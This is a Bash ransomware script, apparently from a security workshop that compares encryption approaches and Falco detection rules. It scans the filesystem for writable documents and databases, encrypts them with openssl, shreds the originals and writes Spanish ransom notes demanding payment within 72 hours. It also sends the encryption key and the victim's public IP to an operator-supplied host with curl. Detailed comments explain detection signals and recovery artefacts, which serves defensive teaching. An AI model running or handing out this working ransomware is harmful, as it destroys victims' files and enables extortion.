Scripts ofensivos (xargs, tarbulk, noxargs), C2 listener, Falco detection rules, slides md + pptx, y estructura del workshop.
#!/bin/false
# /bin/false porque no quiero ejecutar esto :)
# Operator listener address, taken verbatim from argv[1]. It is never
# validated and is interpolated straight into the curl URL in send_key().
IP=$1
# 32 random bytes rendered as 64 hex chars. Note this is used as the openssl
# *passphrase* (encrypt() passes -pbkdf2, so the real AES key is derived from
# it), not as a raw key. It lives only in this shell's memory and in the argv
# of the openssl/curl child processes; nothing in this file writes it to disk.
KEY=$(openssl rand -hex 32)
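#######################################
# Recon step 1: collect every directory with the "others write" bit set.
# Globals:   WRITEABLE_DIRS (written; reset on every call)
# Arguments: $1 - root to scan (optional; defaults to "/", which is what the
#                 original hard-coded, so existing callers are unchanged)
# Outputs:   nothing on stdout; find's permission errors go to stderr
# Notes:
#  - -perm -0002 tests a mode bit only. It does not prove *this* user can
#    write there (read-only mounts, sticky /tmp-style dirs, immutable attrs),
#    so make_readme() may later fail on some of these entries.
#  - Detection angle: a single process stat()ing the entire tree from / is a
#    loud signal on its own, before any file is modified.
#######################################
function get_writeable_dirs() {
  local root=${1:-/}
  WRITEABLE_DIRS=()
  # NUL-delimited so a path containing a newline stays one array element.
  while IFS= read -r -d '' dir; do
    WRITEABLE_DIRS+=("$dir")
  done < <(find "$root" -type d -perm -0002 -print0)
}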
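#######################################
# Recon step 2: collect regular files this user can write to whose name ends
# in .txt, .pdf, .docx or .db.
# Globals:   TARGETS (written; reset on every call)
# Arguments: $1 - root to scan (optional; defaults to "/", matching the
#                 original hard-coded behaviour)
# Outputs:   nothing on stdout; find's permission errors go to stderr
# Notes:
#  - -writable is GNU find and uses access(2), i.e. the *effective* user's
#    permission. Run as root this matches essentially every such file; the
#    result set therefore depends on who executes the script.
#  - The selection criterion here (writable file) is independent of the one
#    in get_writeable_dirs() (o+w directory), so the directories that receive
#    ransom notes are not necessarily the ones that held the encrypted files.
#######################################
function get_interesting_files() {
  local root=${1:-/}
  TARGETS=()
  # NUL-delimited so a path containing a newline stays one array element.
  while IFS= read -r -d '' file; do
    TARGETS+=("$file")
  done < <(find "$root" -type f -writable \( -name "*.txt" -o -name "*.pdf" -o -name "*.docx" -o -name "*.db" \) -print0)
}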
#######################################
# Exfiltrate the passphrase to the operator's listener.
# Globals:   IP (read), KEY (read)
# Network:   one outbound GET to https://$IP/?k=<KEY>&v=<public IP>
# Notes:
#  - `-k` disables TLS certificate verification, so the listener can present
#    any self-signed certificate. The channel is still TLS, so a network
#    sensor sees destination IP, SNI/timing and a small request, not the key.
#  - The public IP is discovered first via `curl -s4 ifconfig.me`; with no
#    scheme given curl defaults to plain http://, and an external-IP lookup
#    right before the C2 call is a recognisable sequence on its own.
#  - Neither curl result is checked and nothing is retried: if this request
#    fails, the operator never receives the key and the encrypted files are
#    unrecoverable.
#######################################
function send_key() {
  curl -sk "https://$IP/?k=$KEY&v=$(curl -s4 ifconfig.me)"
}
#######################################
# Drop the ransom note into every directory collected by get_writeable_dirs().
# Globals:   WRITEABLE_DIRS (read)
# Side effects: creates or overwrites LEEME_URGENTE.txt in each directory.
# Notes:
#  - The target list is "o+w directories", not the directories that actually
#    held the files encrypt() touched, so on a typical system notes land in
#    world-writable scratch locations (presumably /tmp, /var/tmp, /dev/shm and
#    the like) while user data directories may get none.
#  - A burst of creates of one fixed filename across many directories is the
#    classic ransom-note signature; a detection rule keyed on that filename
#    fires once per iteration here.
#  - A failed redirection (read-only mount, immutable directory) only prints
#    to stderr; the loop continues with the next directory.
#######################################
function make_readme() {
  for dir in "${WRITEABLE_DIRS[@]}"; do
    echo "Tus archivos han sido cifrados. Tienes 72 horas para pagar." > "$dir/LEEME_URGENTE.txt"
  done
}
#######################################
# Encrypt every path in TARGETS, one file at a time, then destroy the source.
# This is the sequential "for loop" baseline; the repo description mentions
# xargs/tarbulk variants it is presumably compared against.
# Globals:   TARGETS (read), KEY (read)
# Side effects: writes "$file.enc" beside each target, then shreds and unlinks
#               the original.
# Notes:
#  - KEY is handed to openssl as `-pass pass:<hex>`, i.e. on the command
#    line. For the lifetime of each openssl process the passphrase is visible
#    to anything that reads argv (ps, /proc/<pid>/cmdline, auditd execve
#    records, Falco's proc.args). This is the single most useful artefact for
#    both detection and recovery.
#  - Per file: one openssl execve, one create ending in ".enc", one shred
#    execve, then the unlink of the source. That repeating pattern is what a
#    syscall-level rule sees.
#  - shred is not gated on openssl's exit status (no `&&`): if openssl fails
#    the original is still destroyed and no ciphertext exists.
#######################################
function encrypt() {
  for file in "${TARGETS[@]}"; do
    openssl enc -aes-256-cbc -pbkdf2 -pass pass:"$KEY" -in "$file" -out "$file.enc"
    shred -u "$file"
  done
}
#######################################
# Orchestrates the run: recon (dirs, files) -> encrypt -> ransom notes -> exfil.
# Each phase is wrapped in the bash `time` keyword so its wall-clock cost can
# be compared across the workshop variants; timings go to stderr, the "[*]"
# and "[+]" progress lines to stdout.
# Arguments: forwarded from `main "$@"` but never read here; IP was already
#            taken from $1 at file scope.
# Notes:
#  - There is no `set -e` and no status check between phases: a failing phase
#    does not stop the next one.
#  - Exfiltration is the *last* step and is not timed or checked. If the host
#    is isolated before send_key() runs, the key is lost with this process.
#######################################
function main() {
  echo "[*] Reconocimiento: directorios escribibles..."
  time get_writeable_dirs
  echo "[+] ${#WRITEABLE_DIRS[@]} directorios encontrados."

  echo "[*] Reconocimiento: archivos objetivo..."
  time get_interesting_files
  echo "[+] ${#TARGETS[@]} archivos encontrados."

  echo "[*] Cifrando (for loop, secuencial)..."
  time encrypt
  echo "[+] Cifrado completo."

  echo "[*] Depositando notas de rescate..."
  time make_readme
  echo "[+] Notas en ${#WRITEABLE_DIRS[@]} directorios."

  echo "[*] Exfiltrando clave a $IP..."
  send_key
  echo "[+] Hecho."
}
# Entry point. "$@" is forwarded but main() does not read it; IP was captured
# from $1 at file scope. With #!/bin/false as the shebang this file only runs
# when invoked explicitly as `bash <file> <ip>`.
main "$@"